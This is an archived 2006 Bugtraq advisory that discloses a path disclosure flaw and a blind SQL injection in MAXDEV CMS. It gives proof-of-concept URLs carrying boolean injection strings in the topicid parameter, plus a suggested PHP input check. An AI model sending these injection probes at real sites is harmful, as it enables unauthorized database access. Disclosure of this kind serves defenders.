lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060406180246.16721.qmail@securityfocus.com> Date: 6 Apr 2006 18:02:46 -0000 From: king_purba@...oo.co.uk To: bugtraq@...urityfocus.com Subject: MAXDEV CMS Multiple vulnerabilities Full Path disclosure --------------------- This hole is caused by direct access to file includes/legacy.php not protected PoC : http://site.co.id/maxdev/includes/legacy.php Fix : Turn off display error in php.ini can fix this security issue Blind sql inject ----------------- This hole is caused by filtered script not implemented to $topicid variable in file modules/Topics/pnuserapi.php PoC : http://site.co.id/maxdev/index.php?module=Topics&func=display&topicid=0 AND 1=0 http://site.co.id/maxdev/index.php?module=Topics&func=display&topicid=0 AND 1=1 Fix : Maxdev cms have a filtered script to protect all request but i'm so lazy to analyze the code, then i just add this code in modules/Topics/pnuserapi.php if(isset($_GET['topicid'])) { $topicid=$_GET['topicid']; validate($topicid); } function validate($char) { if(!is_numeric($char)) { die("i have received an error request"); } }